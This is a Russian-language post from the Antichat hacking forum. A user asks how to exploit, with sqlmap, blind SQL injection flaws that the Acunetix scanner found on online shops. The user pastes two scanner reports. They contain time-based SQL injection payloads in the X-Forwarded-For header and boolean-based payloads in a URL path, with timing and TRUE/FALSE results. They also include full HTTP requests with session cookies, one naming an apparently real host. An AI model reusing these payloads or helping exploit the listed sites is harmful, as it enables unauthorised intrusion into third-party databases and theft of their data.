Форум АНТИЧАТ - Показать сообщение отдельно

Цитата:

Сообщение от rozzet

↑
Как эксплуатировать найденые уязвимости акунетикс в sqlmap?помогите разобраться
например это?
The vulnerability affects
https://site.com/product/11/HP-4250N...inter-LIKE-NEW
, X-Forwarded-For
Discovered by Blind SQL Injection
Attack Details
arrow_drop_up
HTTP Header input X-Forwarded-For was set to 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
Tests performed:
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 20.152
0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.489
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.599
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.906
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.474
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.489
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 12.479
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.852
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.218
Original value: 3iv1i
HTTP Request
arrow_drop_up
GET /product/11/HP-4250N-LaserJet-Printer-LIKE-NEW HTTP/1.1
Referer:
https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
Cookie: PHPSESSID=nfek80so1e2bn7p6st0503aro0
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: copyfaxes.com
Connection: Keep-alive

и это например?буду предельно благодарен за помощь.

The vulnerability affects https://www.site.com/ , /--[*]-.html

Discovered by Blind SQL Injection

Attack Details

arrow_drop_up

Path Fragment input /--[*]-.html was set to volts-amplifier-and-cd-players' AND 3*2*1=6 AND '000iUNL'='000iUNL

Tests performed:

volts-amplifier-and-cd-players' AND 2*3*8=6*8 AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 2*3*8=6*9 AND '000iUNL'='000iUNL => FALSE

volts-amplifier-and-cd-players' AND 3*3 FALSE

volts-amplifier-and-cd-players' AND 3*2>(1*5) AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 3*2*0>=0 AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 3*3*9 FALSE

volts-amplifier-and-cd-players' AND 5*4=20 AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 5*4=21 AND '000iUNL'='000iUNL => FALSE

volts-amplifier-and-cd-players' AND 5*6 FALSE

volts-amplifier-and-cd-players' AND 7*7>48 AND '000iUNL'='000iUNL => TRUE

volts-amplifier-and-cd-players' AND 3*2*0=6 AND '000iUNL'='000iUNL => FALSE

volts-amplifier-and-cd-players' AND 3*2*1=6 AND '000iUNL'='000iUNL => TRUE

Original value: volts-amplifier-and-cd-players

HTTP Request

arrow_drop_up

GET /search-110-volts-amplifier-and-cd-players'%20AND%203*2*1=6%20AND%20'000iUNL'='000iUN L-1517.html HTTP/1.1

X-Requested-With: XMLHttpRequest

Referer: https://www.site.com/

Cookie: PHPSESSID=jbf01bl7tu9q5j81f3mui12mof

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate

Host: www.site.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Connection: Keep-alive